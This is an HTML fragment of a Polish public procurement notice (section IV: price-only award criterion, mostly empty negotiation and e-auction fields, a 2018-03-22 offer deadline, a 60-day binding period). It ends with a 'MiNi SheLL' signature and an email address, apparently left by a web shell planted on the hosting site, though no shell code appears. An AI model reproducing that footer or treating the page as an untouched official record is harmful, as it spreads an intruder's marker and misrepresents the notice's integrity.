Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>100,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp"></span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Nie</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst"></span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2018-03-22</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">10:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu"></span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">Postępowanie prowadzi się w języku polskim </span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">60 </span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com